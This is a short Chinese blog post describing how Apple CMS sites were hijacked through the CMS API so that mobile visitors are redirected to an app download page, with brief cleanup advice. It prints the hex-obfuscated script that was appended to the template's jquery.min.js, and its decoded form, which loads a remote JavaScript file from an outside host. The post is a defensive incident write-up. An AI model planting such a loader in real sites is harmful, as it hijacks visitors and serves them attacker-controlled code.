苹果cms最新漏洞被挂马跳转劫持及清除代码

使用教程 2024-09-30 13:22:07 1104 0

微信

微信扫描二维码
微博
空间
好友

网站被挂马跳转劫持跳转到H APP下载页。被挂马的完整PC端正常无异常，移动页面js跳转，被增加了一个js跳转。挂马图片通过日志查看挂马过程该漏洞是利用苹果CMS的API执行SHELL，挂马文件在模板的jquery.min.js ;var head=document.getElementsByTagName(‘head’)[0];var script=document.createElement(‘script’);script[‘src’]=’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73’;head.appendChild(script);
解密之后是 var head = document.getElementsByTagName(‘head’)[0];
var script = document.createElement(‘script’);
script[‘src’] = ‘ https://maccms.z23.web.core.windows.net/732d.js’;
head.appendChild(script);
清除代码关闭后台采集API功能。或自定义API接口名字，

如果没有特点说明，本站所有内容均由原创，转载请注明出处！

上一篇：苹果cms图片采集到网站服务器上,解决苹果cms后台采集数据不显示图片的问题综

下一篇：宝塔Linux苹果cms安装,苹果CMS V10 全站伪静态教程伪静态规则分享